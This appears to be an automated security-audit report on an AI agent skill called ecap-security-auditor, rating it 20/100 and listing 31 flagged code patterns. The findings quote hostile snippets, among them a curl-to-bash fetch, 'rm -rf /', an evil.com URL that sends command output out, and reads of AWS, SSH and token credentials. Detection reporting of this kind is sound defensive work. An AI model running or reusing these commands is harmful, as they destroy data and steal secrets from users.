ClawAudit verdict
ecap-security-auditor
Executes processes AND makes external network calls
ecap-security-auditor scores 20/100 (Dangerous). It requires 3 binaries. 1 undeclared capability detected — the skill does more than its permissions suggest. 6 critical pattern matches in code.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Executes processes AND makes external network calls — may exfiltrate command output
LLM02 · LLM06 · ASI03
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Installs packages AND executes processes — opaque dependency chain with execution
LLM03 · ASI04
Permission integrity
credential_access
package_install
Findings (31)
Pipe to bash — executes piped content as shell commands
PROMPT-TEST-SUITE.md · code · | bash
Uses eval() — can execute arbitrary code
AUDIT-QUALITY-TEST.md · code · eval(
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
PROMPT-TEST-SUITE.md · code · curl -s https://config-cdn.example.com/sync.sh | bash
Recursive delete from root or home — destructive command
AUDIT-QUALITY-TEST.md · code · rm -rf /
Accesses AWS credentials file
AUDIT-QUALITY-TEST.md · code · ~/.aws/credentials
Unicode homoglyph detected — uses lookalike characters to evade pattern matching
PROMPT-TEST-SUITE.md · code
URL flagged by 7/93 VirusTotal engines: http://evil.com/api/integrity
· code · http://evil.com/api/integrity
URL flagged by 7/93 VirusTotal engines: https://evil.com/log?key=$(cat
· code · https://evil.com/log?key=$(cat
Instructs covert action — may act without user awareness
SKILL.md · code · silently
Uses exec() — may execute shell commands
SKILL.md · code · exec(
References child_process — can spawn system processes
SKILL.md · code · child_process
Accesses .ssh directory
AUDIT-QUALITY-TEST.md · code · .ssh/
Accesses cloud provider credentials
AUDIT-QUALITY-TEST.md · code · ~/.aws
Enumerates all environment variables
AUDIT-QUALITY-TEST.md · code · Object.keys(process.env)
subprocess execution — runs system commands from Python
AUDIT-QUALITY-TEST.md · code · subprocess.run(
subprocess with shell=True — command injection vector
AUDIT-QUALITY-TEST.md · code · subprocess.run(user_input, shell=True
Pipe-to-shell pattern (wget | sh)
prompts/audit-prompt-v1-backup.md · prose · downgraded · wget | sh
Pipe to sh — executes piped content as shell commands
prompts/audit-prompt-v1-backup.md · prose · downgraded · | sh
Possible hardcoded credential
scripts/upload.sh · prose · downgraded · API_KEY="${ECAP_API_KEY:-}
Base64 decode (atob) — may hide malicious payloads
SKILL.md · prose · downgraded · atob(
Base64 encoding/decoding
AUDIT-QUALITY-TEST.md · code · Base64-encode
Accesses sensitive environment variables
AUDIT-QUALITY-TEST.md · code · process.env.GITHUB_TOKEN
Node http/https module — low-level network access
PROMPT-TEST-SUITE.md · code · require('https')
Python os.environ.get — reads environment variable
AUDIT-QUALITY-TEST.md · code · os.environ.get(
Accesses system credential store
FERRET-SCAN-ANALYSIS.md · prose · downgraded · Keychain
References SSH/GPG private keys
FERRET-SCAN-ANALYSIS.md · prose · downgraded · SSH-Key
String.fromCharCode — can build strings to evade detection
SKILL.md · prose · downgraded · String.fromCharCode
Popular HTTP library — network access
ADVERSARIAL-TEST.md · prose · downgraded · got
Python directory traversal
AUDIT-QUALITY-TEST.md · code · os.listdir(
Sets world-executable permissions
FERRET-ADOPTION-PLAN.md · prose · downgraded · chmod 777
Makes HTTP request to external URL
PROMPT-TEST-SUITE.md · code · fetch("https://
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/C/D/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 3 system binaries. (1 elevated: curl).
network_outcredential_accessprocess_execpackage_install Thanks — recorded.